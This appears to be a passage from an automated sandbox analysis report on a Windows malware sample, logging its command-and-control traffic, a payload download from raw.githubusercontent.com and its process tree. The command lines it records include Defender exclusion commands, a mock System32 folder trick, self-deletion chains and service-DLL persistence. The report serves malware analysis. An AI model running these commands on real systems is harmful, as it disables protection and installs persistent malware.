                        Aug 21, 2024 09:41:40.344005108 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.344322920 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.349111080 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.516645908 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.516812086 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.521594048 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.688541889 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.700628042 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.705598116 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.872904062 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:40.873918056 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:40.878813982 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.045769930 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.048970938 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.048994064 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.053968906 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.054022074 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.067095041 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.072473049 CEST54326380738.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.072536945 CEST638075432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.183468103 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.188342094 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.188441038 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.188570023 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.193308115 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.805054903 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.806515932 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.811444998 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.980593920 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:41.983573914 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:41.988478899 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.160198927 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.160217047 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.160269022 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.160999060 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.161056042 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.166824102 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.166950941 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.337044954 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.337224960 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.342053890 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.510914087 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.516935110 CEST638085432192.168.2.638.180.213.183
                        Aug 21, 2024 09:41:42.521863937 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.693691969 CEST54326380838.180.213.183192.168.2.6
                        Aug 21, 2024 09:41:42.744781017 CEST638085432192.168.2.638.180.213.183
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Aug 21, 2024 09:39:37.703120947 CEST | 61379 | 53 | 192.168.2.6 | 1.1.1.1
                        Aug 21, 2024 09:39:51.644015074 CEST | 57056 | 53 | 192.168.2.6 | 1.1.1.1
                        Aug 21, 2024 09:39:51.652582884 CEST | 53 | 57056 | 1.1.1.1 | 192.168.2.6
                        Aug 21, 2024 09:40:27.104036093 CEST | 52051 | 53 | 192.168.2.6 | 1.1.1.1
                        Aug 21, 2024 09:40:27.111253977 CEST | 53 | 52051 | 1.1.1.1 | 192.168.2.6
                        Aug 21, 2024 09:40:36.366151094 CEST | 56507 | 53 | 192.168.2.6 | 1.1.1.1
                        Aug 21, 2024 09:40:36.551551104 CEST | 53 | 56507 | 1.1.1.1 | 192.168.2.6
                        Aug 21, 2024 09:40:41.750860929 CEST | 65356 | 53 | 192.168.2.6 | 1.1.1.1
                        Aug 21, 2024 09:40:41.757498026 CEST | 53 | 65356 | 1.1.1.1 | 192.168.2.6
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Aug 21, 2024 09:39:37.703120947 CEST | 192.168.2.6 | 1.1.1.1 | 0x7600 | Standard query (0) | tse1.mm.bing.net | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:39:51.644015074 CEST | 192.168.2.6 | 1.1.1.1 | 0xd9f0 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:40:27.104036093 CEST | 192.168.2.6 | 1.1.1.1 | 0x7fe6 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:40:36.366151094 CEST | 192.168.2.6 | 1.1.1.1 | 0x768 | Standard query (0) | runvrs.com | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:40:41.750860929 CEST | 192.168.2.6 | 1.1.1.1 | 0xac20 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Aug 21, 2024 09:39:37.712625027 CEST | 1.1.1.1 | 192.168.2.6 | 0x7600 | No error (0) | tse1.mm.bing.net | mm-mm.bing.net.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
                        Aug 21, 2024 09:39:37.712625027 CEST | 1.1.1.1 | 192.168.2.6 | 0x7600 | No error (0) | ax-0001.ax-msedge.net |  | 150.171.27.10 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:39:37.712625027 CEST | 1.1.1.1 | 192.168.2.6 | 0x7600 | No error (0) | ax-0001.ax-msedge.net |  | 150.171.28.10 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:39:51.652582884 CEST | 1.1.1.1 | 192.168.2.6 | 0xd9f0 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:39:51.652582884 CEST | 1.1.1.1 | 192.168.2.6 | 0xd9f0 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:39:51.652582884 CEST | 1.1.1.1 | 192.168.2.6 | 0xd9f0 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:39:51.652582884 CEST | 1.1.1.1 | 192.168.2.6 | 0xd9f0 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:40:27.111253977 CEST | 1.1.1.1 | 192.168.2.6 | 0x7fe6 | No error (0) | ipinfo.io |  | 34.117.59.81 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:40:36.551551104 CEST | 1.1.1.1 | 192.168.2.6 | 0x768 | No error (0) | runvrs.com |  | 38.180.213.183 | A (IP address) | IN (0x0001) | false
                        Aug 21, 2024 09:40:41.757498026 CEST | 1.1.1.1 | 192.168.2.6 | 0xac20 | No error (0) | github.com |  | 140.82.121.3 | A (IP address) | IN (0x0001) | false
                        • raw.githubusercontent.com
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.6 | 63778 | 185.199.108.133 | 443 | 3552 | C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-21 07:39:52 UTC | 348 | OUT | GET /panchitopistolesx/items/main/hardsvcupdt.exe HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        2024-08-21 07:39:52 UTC | 899 | IN | HTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 15180800
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: application/octet-stream
                        ETag: "d1a7de94421ac17b8fcb2e241080e66ee0f4b7510936df7f54af190aa7c459ba"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: F803:A456A:59CC:719F:66C599C1
                        Accept-Ranges: bytes
                        Date: Wed, 21 Aug 2024 07:39:52 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-nyc-kteb1890094-NYC
                        X-Cache: MISS
                        X-Cache-Hits: 0
                        X-Timer: S1724225992.254248,VS0,VE119
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: 46d903d420360c7edc1b70621e3809785949ac6b
                        Expires: Wed, 21 Aug 2024 07:44:52 GMT
                        Source-Age: 0

                        Target ID: 3
                        Start time: 03:39:40
                        Start date: 21/08/2024
                        Path: C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        Wow64 process (32bit): false
                        Commandline: "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
                        Imagebase: 0x7ff646e40000
                        File size: 440'832 bytes
                        MD5 hash: 00948444F3E248047722667419D54205
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: low
                        Has exited: true

                        Target ID: 6
                        Start time: 03:39:45
                        Start date: 21/08/2024
                        Path: C:\Windows\System32\cmd.exe
                        Wow64 process (32bit): false
                        Commandline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
                        Imagebase: 0x7ff7fc950000
                        File size: 289'792 bytes
                        MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high
                        Has exited: true

                        Target ID: 7
                        Start time: 03:39:45
                        Start date: 21/08/2024
                        Path: C:\Windows\System32\conhost.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase: 0x7ff66e660000
                        File size: 862'208 bytes
                        MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high
                        Has exited: true

                        Target ID:8
                        Start time:03:39:45
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:03:40:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:03:40:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:03:40:02
                        Start date:21/08/2024
                        Path:C:\Users\user\Desktop\pyld64.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\pyld64.exe"
                        Imagebase:0x7ff7fc8e0000
                        File size:15'180'800 bytes
                        MD5 hash:43BCE45D873189F9AE2767D89A1C46E0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 18%, ReversingLabs
                        • Detection: 65%, Virustotal, Browse
                        Reputation:low
                        Has exited:true

                        Target ID:16
                        Start time:03:40:03
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:17
                        Start time:03:40:03
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:18
                        Start time:03:40:03
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:19
                        Start time:03:40:05
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:20
                        Start time:03:40:05
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7934f0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:21
                        Start time:03:40:05
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:22
                        Start time:03:40:10
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:23
                        Start time:03:40:10
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:24
                        Start time:03:40:10
                        Start date:21/08/2024
                        Path:C:\Windows\System32\usvcinsta64.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\usvcinsta64.exe"
                        Imagebase:0x7ff6b8fa0000
                        File size:14'693'888 bytes
                        MD5 hash:11DDC0A34BAC7AB099D2EE8D9817BF58
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 58%, ReversingLabs
                        Has exited:true

                        Target ID:25
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:26
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:28
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:29
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:30
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:32
                        Start time:03:40:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:33
                        Start time:03:40:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:34
                        Start time:03:40:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:36
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:37
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:38
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:39
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:40
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows \System32\printui.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows \System32\printui.exe"
                        Imagebase:0x7ff68c620000
                        File size:64'000 bytes
                        MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:41
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:42
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:43
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:44
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:45
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:46
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:47
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:48
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:49
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                        Imagebase:0x7ff7403e0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:50
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                        Imagebase:0x7ff608be0000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:51
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\reg.exe
                        Wow64 process (32bit):false
                        Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
                        Imagebase:0x7ff7f38e0000
                        File size:77'312 bytes
                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:52
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start x543664
